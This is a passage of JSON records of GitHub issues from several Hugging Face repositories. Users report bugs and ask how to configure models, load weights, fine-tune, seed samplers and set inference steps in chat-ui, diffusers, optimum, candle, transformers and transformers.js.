}, { "repo": "huggingface/chat-ui", "number": 459, "title": "Chats Stop generation button is broken?", "body": "whenever I'm using the Chat UI on hf.co/chat, and I press the stop generation button it deletes both the prompt and the response?", "url": "https://github.com/huggingface/chat-ui/issues/459", "state": "open", "labels": [ "support" ], "created_at": "2023-09-21T19:38:38Z", "updated_at": "2023-10-08T00:44:44Z", "comments": 4, "user": "VatsaDev" }, { "repo": "huggingface/chat-ui", "number": 457, "title": "Custom Models breaking Chat-ui", "body": "Setting a custom model in .env.local is now breaking chat-ui for me. 
@jackielii @nsarrazin \r\n\r\nIf I start mongo and then run ```npm run dev``` with a .env.local file including only the mongo url, there is no issue.\r\n\r\nThen I add the following:\r\n```\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"OpenAssistant/oasst-sft-4-pythia-12b-epoch-3.5\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"websiteUrl\": \"https://open-assistant.io\",\r\n \"userMessageToken\": \"<|prompter|>\", # This does not need to be a token, can be any string\r\n \"assistantMessageToken\": \"<|assistant|>\", # This does not need to be a token, can be any string\r\n \"userMessageEndToken\": \"<|endoftext|>\", # Applies only to user messages. Can be any string.\r\n \"assistantMessageEndToken\": \"<|endoftext|>\", # Applies only to assistant messages. Can be any string.\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|endoftext|>\"] # This does not need to be tokens, can be any list of strings\r\n }\r\n }\r\n]`\r\n```\r\nand now I get:\r\n```\r\nUnexpected token \r\n in JSON at position 424\r\nSyntaxError: Unexpected token \r\n in JSON at position 424\r\n at JSON.parse ()\r\n at eval (/Users/ronanmcgovern/TR/chat-ui/src/lib/server/models.ts:75:14)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async instantiateModule (file:///Users/ronanmcgovern/TR/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9\r\n```\r\nThe specific line of code being referenced is this:\r\n```\r\n\"Based on the conversation history (my previous questions are: {{previousMessages}}), give me an appropriate query to answer my question for google search. You should not say more than query. You should not say any words except the query. 
For the context, today is {{currentDate}}\" +\r\n\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/457", "state": "closed", "labels": [ "support" ], "created_at": "2023-09-21T11:12:42Z", "updated_at": "2023-09-21T16:03:30Z", "comments": 10, "user": "RonanKMcGovern" }, { "repo": "huggingface/datasets", "number": 6252, "title": "exif_transpose not done to Image (PIL problem)", "body": "### Feature request\n\nI noticed that some of my images loaded using PIL have some exif metadata that can rotate them when loading.\r\nSince datasets.features.Image uses PIL for loading, the loaded image may be rotated (width and height will be inverted); thus for tasks such as object detection and LayoutLM this can create some inconsistencies (between input bboxes and input images). \r\n\r\nFor now there is no option in datasets.features.Image to specify that. We need to do the following when preparing examples (when preparing images for training, test or inference): \r\n```\r\nfrom PIL import Image, ImageOps \r\npil = ImageOps.exif_transpose(pil)\r\n```\r\n\r\nreference: https://stackoverflow.com/a/63950647/5720150 \r\n\r\nIs it possible to add this by default to datasets.features.Image? Or to add the option to do the ImageOps.exif_transpose?\r\n\r\nThank you\n\n### Motivation\n\nPrevent having inverted data related to exif metadata that may affect object detection tasks\n\n### Your contribution\n\nI can help with changing datasets.features.Image. ", "url": "https://github.com/huggingface/datasets/issues/6252", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-09-21T08:11:46Z", "updated_at": "2024-03-19T15:29:43Z", "comments": 2, "user": "rhajou" }, { "repo": "huggingface/optimum", "number": 1401, "title": "BUG: running a python file called onnx.py causes circular import errors.", "body": "### System Info\r\n\r\n```shell\r\nlatest optimum, python 3.10, linux cpu.\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@JingyaHuang, @echarlaix, @michaelbenayoun\r\n\r\n\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nhttps://github.com/huggingface/optimum/issues/1177\r\n\r\nDescription of Bug:\r\nIf I create a py file to run my own scripts and name it \"onnx.py\", it wreaks all kinds of havoc. Specifically circular import errors. It took me a while to figure out that it was caused by \"onnx.py\" being a reserved name. This is the first time I've ever come across such an issue. I'm not sure if other modules prevent these issues by ringfencing their scope to specific folders or namespaces.. or whether it's just bad luck.\r\n\r\nIs it possible to ringfence this kind of issue by either renaming the internal onnx.py file to something that users would never use OR customizing a validation check that tells users which filenames are reserved, OR at least updating the error message so that users don't need half a day to figure out what's causing the issue?\r\n\r\nMany thanks\r\n\r\n### Expected behavior\r\n\r\nThat either I can use any filename for my script.py (eg. 
onnx.py) without issues\r\n\r\nOR\r\n\r\nThere's a really clear error message that states \"please do not use the following reserved names for your python scripts: eg1.py, eg2.py, etc\"\r\n\r\nMuch appreciated", "url": "https://github.com/huggingface/optimum/issues/1401", "state": "open", "labels": [ "bug" ], "created_at": "2023-09-21T04:12:49Z", "updated_at": "2023-10-05T14:32:40Z", "comments": 1, "user": "gidzr" }, { "repo": "huggingface/diffusers", "number": 5124, "title": "How to fine tune checkpoint .safetensor", "body": "### Describe the bug\n\nI tried to fine tuning a model from a checkpoint (i.e https://civitai.com/models/119202/talmendoxl-sdxl-uncensored-full-model)I converted the checkpoint to diffuser format using this library:\r\nhttps://github.com/waifu-diffusion/sdxl-ckpt-converter/\r\n\r\nThe model converted works fine for inference and the training script works fine if I use a standard base i.e.: \"stabilityai/stable-diffusion-xl-base-1.0\", but I have error when start from converted model\n\n### Reproduction\n\ndownload checkpoint: https://civitai.com/models/119202/talmendoxl-sdxl-uncensored-full-model\r\nconvert using: https://github.com/waifu-diffusion/sdxl-ckpt-converter/\r\ntstart training with:\r\n !accelerate launch train_text_to_image_lora_sdxl.py \\\r\n --pretrained_model_name_or_path=\"/content/drive/MyDrive/talmendoxlSDXL_v11Beta\" \\\r\n --pretrained_vae_model_name_or_path=\"madebyollin/sdxl-vae-fp16-fix\" \\\r\n --dataset_name=\"$INSTANCE_DIR_PARSED\" \\\r\n --caption_column=\"text\" \\\r\n --resolution=1024 \\\r\n --train_batch_size=1 \\\r\n --num_train_epochs=$TRAIN_EPOCHS \\\r\n --checkpointing_steps=1000000 \\\r\n --learning_rate=$LEARNING_RATE \\\r\n --lr_scheduler=\"constant\" \\\r\n --lr_warmup_steps=0 \\\r\n --seed=42 \\\r\n --output_dir=\"$OUTPUT_DIR\" \\\r\n --enable_xformers_memory_efficient_attention \\\r\n --gradient_checkpointing \\\r\n --mixed_precision=\"fp16\" \\\r\n --use_8bit_adam \n\n### Logs\n\n```shell\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\n{'clip_sample_range', 'dynamic_thresholding_ratio', 'variance_type', 'thresholding'} was not found in config. 
Values will be initialized to default values.\r\nTraceback (most recent call last):\r\n File \"/content/diffusers/examples/text_to_image/train_text_to_image_lora_sdxl.py\", line 1271, in \r\n main(args)\r\n File \"/content/diffusers/examples/text_to_image/train_text_to_image_lora_sdxl.py\", line 554, in main\r\n text_encoder_one = text_encoder_cls_one.from_pretrained(\r\n File \"/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py\", line 2740, in from_pretrained\r\n raise EnvironmentError(\r\nOSError: Error no file named pytorch_model.bin, tf_model.h5, model.ckpt.index or flax_model.msgpack found in directory /content/drive/MyDrive/talmendoxlSDXL_v11Beta.\r\nTraceback (most recent call last):\r\n File \"/usr/local/bin/accelerate\", line 8, in \r\n sys.exit(main())\r\n File \"/usr/local/lib/python3.10/dist-packages/accelerate/commands/accelerate_cli.py\", line 45, in main\r\n args.func(args)\r\n File \"/usr/local/lib/python3.10/dist-packages/accelerate/commands/launch.py\", line 979, in launch_command\r\n simple_launcher(args)\r\n File \"/usr/local/lib/python3.10/dist-packages/accelerate/commands/launch.py\", line 628, in simple_launcher\r\n raise subprocess.CalledProcessError(returncode=process.returncode, cmd=cmd)\r\nsubprocess.CalledProcessError: Command '['/usr/bin/python3', 'train_text_to_image_lora_sdxl.py', '--pretrained_model_name_or_path=/content/drive/MyDrive/talmendoxlSDXL_v11Beta', '--pretrained_vae_model_name_or_path=madebyollin/sdxl-vae-fp16-fix', '--dataset_name=/content/instancefolder_parsed', '--caption_column=text', '--resolution=1024', '--train_batch_size=1', '--num_train_epochs=1', '--checkpointing_steps=1000000', '--learning_rate=2e-05', '--lr_scheduler=constant', '--lr_warmup_steps=0', '--seed=42', '--output_dir=/content/lora-trained-xl-colab', '--enable_xformers_memory_efficient_attention', '--gradient_checkpointing', '--mixed_precision=fp16', '--use_8bit_adam']' returned non-zero exit status 1.\n```\n\n\n### System Info\n\n- `diffusers` version: 0.21.0.dev0\r\n- Platform: Linux-5.15.120+-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- PyTorch version (GPU?): 2.0.1+cu118 (True)\r\n- Huggingface_hub version: 0.17.2\r\n- Transformers version: 4.33.2\r\n- Accelerate version: 0.21.0\r\n- xFormers version: 0.0.21\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@williamberman, @patrickvonplaten, @sayakpau", "url": "https://github.com/huggingface/diffusers/issues/5124", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-09-20T22:45:38Z", "updated_at": "2023-11-22T15:06:19Z", "user": "EnricoBeltramo" }, { "repo": "huggingface/diffusers", "number": 5118, "title": "how to use controlnet's reference_only fuction with diffusers??", "body": "### Model/Pipeline/Scheduler description\n\ncan anyone help me to understand how to use controlnet's reference_only fuction with diffusers\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/5118", "state": "closed", "labels": [ "stale" ], "created_at": "2023-09-20T10:17:53Z", "updated_at": "2023-11-08T15:07:34Z", "user": "sudip550" }, { "repo": "huggingface/transformers.js", "number": 321, "title": "[Question] Image Embeddings for ViT", "body": "Is it possible to get image embeddings using 
Xenova/vit-base-patch16-224-in21k model? We use feature_extractor to get embeddings for sentences. Can we use feature_extractor to get image embeddings?\r\n```js\r\nconst model_id = \"Xenova/vit-base-patch16-224-in21k\";\r\nconst image = await RawImage.read(\"https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/football-match.jpg\");\r\nconst classifier = await pipeline(\"image-classification\", model_id);\r\nconst { image_embeddings } = await classifier.processor.feature_extractor(image);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/321", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-20T01:22:08Z", "updated_at": "2024-01-13T01:25:03Z", "user": "hadminh" }, { "repo": "huggingface/optimum", "number": 1395, "title": "TensorrtExecutionProvider documentation", "body": "### System Info\n\n```shell\nmain, docs\n```\n\n\n### Who can help?\n\n@fxmarty \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe method described in the docs for [TRT engine building](https://huggingface.co/docs/optimum/onnxruntime/usage_guides/gpu#tensorrt-engine-build-and-warmup) is outdated, first mentioned [here](https://github.com/huggingface/optimum/issues/842#issuecomment-1568766399), I tested the dynamic shapes method in `optimum-benchmark` [here](https://github.com/huggingface/optimum-benchmark/pull/55#issuecomment-1721180586). \n\n### Expected behavior\n\nWe can update the docs with this snippet:\r\n\r\n```python\r\nprovider_options = {\r\n \"trt_engine_cache_enable\": True,\r\n \"trt_engine_cache_path\": \"tmp/trt_cache_gpt2_example\",\r\n \"trt_profile_min_shapes\": \"input_ids:1x16,attention_mask:1x16\",\r\n \"trt_profile_max_shapes\": \"input_ids:1x64,attention_mask:1x64\",\r\n \"trt_profile_opt_shapes\": \"input_ids:1x32,attention_mask:1x32\",\r\n}\r\n\r\nort_model = ORTModelForCausalLM.from_pretrained(\r\n \"gpt2\",\r\n export=True,\r\n use_cache=False,\r\n provider=\"TensorrtExecutionProvider\",\r\n provider_options=provider_options,\r\n)\r\n\r\nort_model.generate(\r\n input_ids=torch.tensor([[1] * 16]).to(\"cuda\"),\r\n max_new_tokens=64-16,\r\n min_new_tokens=64-16,\r\n pad_token_id=0,\r\n eos_token_id=0,\r\n)\r\n```\r\n\r\nthough it's still not clear to me what's the effect of `trt_profile_opt_shapes`.", "url": "https://github.com/huggingface/optimum/issues/1395", "state": "open", "labels": [ "documentation", "onnxruntime" ], "created_at": "2023-09-19T09:06:17Z", "updated_at": "2023-09-19T09:57:26Z", "comments": 1, "user": "IlyasMoutawwakil" }, { "repo": "huggingface/transformers.js", "number": 317, "title": "How to use xenova/transformers in VSCode Extension", "body": "Hey guys! 
I am trying to use xenova/transformers in CodeStory; we ship a vscode extension as well, and I am hitting issues trying to get the import working. Here's every flavor of importing the library which I have tried to date.\r\n\r\n```\r\nconst TransformersApi = Function('return import(\"@xenova/transformers\")')();\r\nconst { pipeline, env } = await TransformersApi;\r\n```\r\n\r\n```\r\nconst { pipeline, env } = await import('@xenova/transformers')\r\n```\r\n\r\n```\r\nconst TransformersApi = require('@xenova/transformers');\r\nconst { pipeline, env } = await TransformersApi;\r\n```\r\n\r\nI think the crux of the issue is the node environment which VSCode uses, which does not allow any of these to work, and I keep getting the dreaded:\r\n\r\n```\r\nError [ERR_REQUIRE_ESM]: require() of ES Module /Applications/Aide.app/Contents/Resources/app/extensions/codestory/node_modules/@xenova/transformers/src/transformers.js from /Applications/Aide.app/Contents/Resources/app/extensions/codestory/out/llm/embeddings/sentenceTransformers.js not supported.\r\nInstead change the require of transformers.js in /Applications/Aide.app/Contents/Resources/app/extensions/codestory/out/llm/embeddings/sentenceTransformers.js to a dynamic import() which is available in all CommonJS modules.\r\n\r\n```\r\n\r\nAfter checking the generated js code, it ends up including the require word:\r\n```\r\n__importStar(require('@xenova/transformers'))\r\n```\r\n\r\nWhen I used the first option (the Function wrapper) I got a very weird error, btw:\r\n```\r\n[Extension Host] TypeError: A dynamic import callback was not specified.\r\n at new NodeError (node:internal/errors:399:5)\r\n at importModuleDynamicallyCallback (node:internal/process/esm_loader:39:9)\r\n at eval (eval at (/Applications/Aide.app/Contents/Resources/app/extensions/codestory/out/llm/embeddings/sentenceTransformers.js:46:41), :3:1)\r\n\r\n```\r\n\r\nThis is mostly coming from the node version which VSCode uses itself.\r\n\r\nDo you guys have any suggestions on what I can do about this? Thanks!", "url": "https://github.com/huggingface/transformers.js/issues/317", "state": "open", "labels": [ "question" ], "created_at": "2023-09-19T01:35:21Z", "updated_at": "2024-07-27T20:36:37Z", "user": "theskcd" }, { "repo": "huggingface/candle", "number": 894, "title": "How to fine-tune Llama?", "body": "Hello everybody,\r\n\r\nI am trying to fine-tune the Llama model, but cannot load the safetensors file. 
I have modified the training loop for debugging and development:\r\n```rust\r\npub fn run(args: &crate::TrainingCmd, common_args: &crate::Args) -> Result<()> {\r\n let config_path = match &args.config {\r\n Some(config) => std::path::PathBuf::from(config),\r\n None => {\r\n let api = hf_hub::api::sync::Api::new().unwrap();\r\n println!(\"loading the model weights from {}\", args.model_id);\r\n let api = api.model(args.model_id.clone());\r\n api.get(&args.which_model).unwrap()\r\n }\r\n };\r\n\r\n\r\n let device = candle_examples::device(common_args.cpu)?;\r\n let config = Config::tiny();\r\n \r\n let mut varmap = candle_nn::VarMap::new();\r\n let vb = candle_nn::VarBuilder::from_varmap(&varmap, DType::F32, &device);\r\n varmap.load(config_path).unwrap();\r\n\r\n /*let cache = Cache::new(false, &config, vb.pp(\"rot\"))?;\r\n let model = Llama::load(vb, &cache, config, true)?;\r\n\r\n let params = candle_nn::ParamsAdamW {\r\n lr: args.learning_rate,\r\n ..Default::default()\r\n };\r\n let mut opt = candle_nn::AdamW::new(varmap.all_vars(), params)?;\r\n for (batch_index, batch) in batch_iter.enumerate() {\r\n let (inp, tgt) = batch?;\r\n let logits = model.forward(&inp, 0)?;\r\n let loss = candle_nn::loss::cross_entropy(&logits.flatten_to(1)?, &tgt.flatten_to(1)?)?;\r\n opt.backward_step(&loss)?;\r\n\r\n if batch_index > 0 && batch_index % 1000 == 0 {\r\n varmap.save(\"checkpoint.safetensors\")?\r\n }\r\n }*/\r\n Ok(())\r\n}\r\n```\r\n\r\nI realize this error is likely because I cannot use VarMap::load to load such a large safetensors file (as described [here](https://github.com/huggingface/safetensors/blob/main/README.md#benefits)). However, how can I use VarMap (or something else that allows me to modifiy the tensor map) to load the weights? If there is not such a method, how should I implement this myself?\r\n\r\nThank you!\r\nEric", "url": "https://github.com/huggingface/candle/issues/894", "state": "closed", "labels": [], "created_at": "2023-09-18T22:18:04Z", "updated_at": "2023-09-21T10:05:57Z", "user": "EricLBuehler" }, { "repo": "huggingface/candle", "number": 891, "title": "How to do fine-tuning?", "body": "Hello everybody,\r\n\r\nI was looking through the Candle examples and cannot seem to find an example of fine-tuning for Llama. It appears the only example present is for training from scratch. How should I fine-tune a pretrained model on my own data? Or, more generally, how should I fine tune a model that it loaded from a safetensor file (and whose VarBuilder is immutable as discussed in #883)?\r\n\r\nThanks!\r\nEric", "url": "https://github.com/huggingface/candle/issues/891", "state": "closed", "labels": [], "created_at": "2023-09-18T18:37:42Z", "updated_at": "2024-07-08T15:13:01Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers", "number": 26218, "title": "How to manually set the seed of randomsampler generator when training using transformers trainer", "body": "### System Info\r\n\r\nI used a [script](https://github.com/huggingface/transformers/blob/v4.33.0/examples/pytorch/language-modeling/run_clm.py) to continue pre-training the llama2 model. In the second epoch, the loss began to explode, so I chose to reload the checkpoint to continue training, but the loss changes were completely consistent with before, which made me doubt the iteration of the dataset is always consistent. 
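(This replay is deliberate: on resume, Trainer reseeds the sampler from the training arguments so the run is reproducible. The knob that controls the sampler separately from model init is `data_seed`; a sketch, assuming a transformers release recent enough to have it:)

```python
from transformers import TrainingArguments

# `seed` fixes model init / dropout; `data_seed` seeds the generator behind
# the training sampler, so changing only `data_seed` reshuffles the data order.
training_args = TrainingArguments(
    output_dir="out",
    seed=42,
    data_seed=123,
)
```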
So I tried modifying the [seed.](https://github.com/huggingface/transformers/blob/v4.33.0/examples/pytorch/language-modeling/run_clm.py#L309C33-L309C33) But in the end, my training loss is always consistent, and the RandomSampler state I print is always the same. \r\nI hope someone can tell me how to solve this problem, including where the seed of this generator is specified.\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\ntransformers==4.33.0\r\npytorch==1.13.1\r\naccelerate==0.21.0\r\ndeepspeed==0.10.0\r\n\r\n### Expected behavior\r\n\r\nI expect the sampling of the training dataset to be different every time.", "url": "https://github.com/huggingface/transformers/issues/26218", "state": "closed", "labels": [], "created_at": "2023-09-18T14:19:11Z", "updated_at": "2023-11-20T08:05:37Z", "user": "young-chao" }, { "repo": "huggingface/transformers.js", "number": 313, "title": "[Question] How to use remote models for automatic-speech-recognition", "body": "I have an html file that is\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n```\r\n\r\nI'm just trying to load the model, but it seems to be requesting from a local url rather than hugging face. How can I enable remote models?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/313", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-18T04:56:52Z", "updated_at": "2023-09-18T05:19:00Z", "user": "LehuyH" }, { "repo": "huggingface/candle", "number": 883, "title": "Question: How to properly use VarBuilder?", "body": "Hello everybody,\n\nI am working on implementing LoRA and want to use the VarBuilder system. However, when I try to get a tensor with get_with_hints, I get a CannotFindTensor Err. To create the Tensor, I do:\n```rust\nvb.pp(\"a\").get_with_hints(\n...lora specific shape...\n\"weight\",\n...lora specific hints...\n)\n```\nHowever, this fails with the CannotFindTensor error. How can I create the Tensor, or perhaps am I using the API incorrectly?\n\nThanks!\nEric", "url": "https://github.com/huggingface/candle/issues/883", "state": "closed", "labels": [], "created_at": "2023-09-17T20:40:27Z", "updated_at": "2023-09-17T21:02:24Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 310, "title": "How to load model from the static folder path in nextjs or react or vanilla js?", "body": "\r\n", "url": "https://github.com/huggingface/transformers.js/issues/310", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-17T14:13:57Z", "updated_at": "2023-09-27T08:36:29Z", "user": "adnankarim" }, { "repo": "huggingface/safetensors", "number": 360, "title": "The default file format used when loading the model？", "body": "I guess that huggingface loads .safetensors files by default when loading models. Is this mandatory? Can I choose to load files in .bin format? (Because I only downloaded weights in bin format, and it reported an error “ could not find a file in safeTensor format”). 
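(For what it's worth, `from_pretrained` exposes a switch for this. A minimal sketch, with the model path as a placeholder:)

```python
from transformers import AutoModelForCausalLM

# use_safetensors=False forces loading the .bin (PyTorch) weights even when
# no .safetensors file exists; "path/to/model" is a placeholder.
model = AutoModelForCausalLM.from_pretrained("path/to/model", use_safetensors=False)
```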
I could not find related information in the docs.\n\nThanks for your help.", "url": "https://github.com/huggingface/safetensors/issues/360", "state": "closed", "labels": [], "created_at": "2023-09-15T14:56:13Z", "updated_at": "2023-09-19T10:34:57Z", "comments": 1, "user": "Kong-Aobo" }, { "repo": "huggingface/diffusers", "number": 5055, "title": "How to download config.json if it is not in the root directory.", "body": "Is there any way to download the VAE for a model where config.json is not in the root directory?\r\n\r\n```python\r\nvae = AutoencoderKL.from_pretrained(\"redstonehero/kl-f8-anime2\")\r\n``` \r\n\r\nFor example, as shown above, there is no problem if config.json exists in the root directory, but if it does not exist, an error will occur.\r\n\r\n```python\r\nvae = AutoencoderKL.from_pretrained(\"hakurei/waifu-diffusion\")\r\n``` \r\nI would be glad to get your advice.", "url": "https://github.com/huggingface/diffusers/issues/5055", "state": "closed", "labels": [], "created_at": "2023-09-15T11:37:47Z", "updated_at": "2023-09-16T00:15:58Z", "user": "suzukimain" }, { "repo": "huggingface/transformers.js", "number": 305, "title": "[Question] Can I work with Peft models through the API?", "body": "Let's say I have the following code in Python. How would I translate that to js?\r\n\r\n````\r\nimport torch\r\nfrom peft import PeftModel, PeftConfig\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\npeft_model_id = \"samwit/bloom-7b1-lora-tagger\"\r\nconfig = PeftConfig.from_pretrained(peft_model_id)\r\nmodel = AutoModelForCausalLM.from_pretrained(config.base_model_name_or_path, return_dict=True, load_in_8bit=True, device_map='auto')\r\ntokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path)\r\n\r\n# Load the Lora model\r\nmodel = PeftModel.from_pretrained(model, peft_model_id)\r\n````\r\n", "url": "https://github.com/huggingface/transformers.js/issues/305", "state": "open", "labels": [ "question" ], "created_at": "2023-09-14T21:02:59Z", "updated_at": "2023-09-16T00:16:03Z", "user": "chrisfel-dev" }, { "repo": "huggingface/diffusers", "number": 5042, "title": "How to give number of inference steps to Wuerstchen prior pipeline", "body": "**The below works with the default DEFAULT_STAGE_C_TIMESTEPS, but it always generates with exactly 29 prior inference steps** \r\n\r\n```\r\n prior_output = prior_pipeline(\r\n prompt=prompt,\r\n height=height,\r\n width=width,\r\n\t\tnum_inference_steps=prior_num_inference_steps,\r\n timesteps=DEFAULT_STAGE_C_TIMESTEPS,\r\n negative_prompt=negative_prompt,\r\n guidance_scale=prior_guidance_scale,\r\n num_images_per_prompt=num_images_per_prompt,\r\n generator=generator,\r\n callback=callback_prior,\r\n )\r\n```\r\n\r\n\r\nWhen I make it like below, I get this error\r\n\r\n```\r\n prior_output = prior_pipeline(\r\n prompt=prompt,\r\n height=height,\r\n width=width,\r\n\t\tprior_num_inference_steps = prior_num_inference_steps,\r\n # timesteps=DEFAULT_STAGE_C_TIMESTEPS,\r\n negative_prompt=negative_prompt,\r\n guidance_scale=prior_guidance_scale,\r\n num_images_per_prompt=num_images_per_prompt,\r\n generator=generator,\r\n callback=callback_prior,\r\n )\r\n```\r\n\r\n`TypeError: WuerstchenPriorPipeline.__call__() got an unexpected keyword argument 'prior_num_inference_steps'`\r\n\r\n\r\nBut the documentation shows it???\r\n\r\nhttps://huggingface.co/docs/diffusers/main/en/api/pipelines/wuerstchen\r\n\r\n`prior_num_inference_steps (Union[int, Dict[float, int]], optional, defaults to 30) — The number of prior 
denoising steps. More denoising steps usually lead to a higher quality image at the expense of slower inference. For more specific timestep spacing, you can pass customized prior_timesteps`\r\n\r\n@sayakpaul @dome272 @patrickvonplaten @williamberman\r\n\r\n\r\n**Below is the entire code. What I want is to be able to set any number of prior and decoder inference steps**\r\n\r\n```\r\n prior_output = prior_pipeline(\r\n prompt=prompt,\r\n height=height,\r\n width=width,\r\n\t\tprior_num_inference_steps = prior_num_inference_steps,\r\n # timesteps=DEFAULT_STAGE_C_TIMESTEPS,\r\n negative_prompt=negative_prompt,\r\n guidance_scale=prior_guidance_scale,\r\n num_images_per_prompt=num_images_per_prompt,\r\n generator=generator,\r\n callback=callback_prior,\r\n )\r\n\r\n if PREVIEW_IMAGES:\r\n for _ in range(len(DEFAULT_STAGE_C_TIMESTEPS)):\r\n r = next(prior_output)\r\n if isinstance(r, list):\r\n yield r\r\n prior_output = r\r\n \r\n decoder_output = decoder_pipeline(\r\n image_embeddings=prior_output.image_embeddings,\r\n prompt=prompt,\r\n\t\tnum_inference_steps = decoder_num_inference_steps,\r\n # timesteps=decoder_timesteps,\r\n guidance_scale=decoder_guidance_scale,\r\n negative_prompt=negative_prompt,\r\n generator=generator,\r\n output_type=\"pil\",\r\n ).images\r\n yield decoder_output\r\n```\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/5042", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-14T15:21:31Z", "updated_at": "2023-09-20T07:41:19Z", "user": "FurkanGozukara" }, { "repo": "huggingface/chat-ui", "number": 440, "title": "Web Search not working ", "body": "I have been having this issue where it just searches something but then never shows me the answer; it shows max tokens.\r\nI just keep seeing this:\r\nfirst I see the links of the resources\r\n\r\n\r\nbut then it does nothing at all\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/108006611/6eefb6a4-426e-408c-85bb-1106161fd481)\r\n\r\nI just see this and do not even get the model response", "url": "https://github.com/huggingface/chat-ui/issues/440", "state": "closed", "labels": [ "support" ], "created_at": "2023-09-14T13:50:15Z", "updated_at": "2023-09-20T14:16:49Z", "comments": 5, "user": "bilalazhar72" }, { "repo": "huggingface/chat-ui", "number": 438, "title": "running the app with websearch fails", "body": "Hey, after adding the Serper API key I'm trying to run the app locally with \"npm run dev\" and I get an issue related to websearch:\r\n\r\n```\r\n[vite]: Rollup failed to resolve import \"@xenova/transformers\" from \"C:/Users/username/chat-ui/src/lib/server/websearch/sentenceSimilarity.ts\".\r\nThis is most likely unintended because it can break your application at runtime.\r\nIf you do want to externalize this module explicitly add it to\r\n`build.rollupOptions.external`\r\nerror during build:\r\nError: [vite]: Rollup failed to resolve import \"@xenova/transformers\" from \"C:/Users/username/chat-ui/src/lib/server/websearch/sentenceSimilarity.ts\".\r\nThis is most likely unintended because it can break your application at runtime.\r\nIf you do want to externalize this module explicitly add it to\r\n`build.rollupOptions.external`\r\n at viteWarn (file:///C:/Users/username/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:48142:27) \r\n at onRollupWarning (file:///C:/Users/username/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:48174:9)\r\n at onwarn (file:///C:/Users/username/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:47902:13) \r\n at 
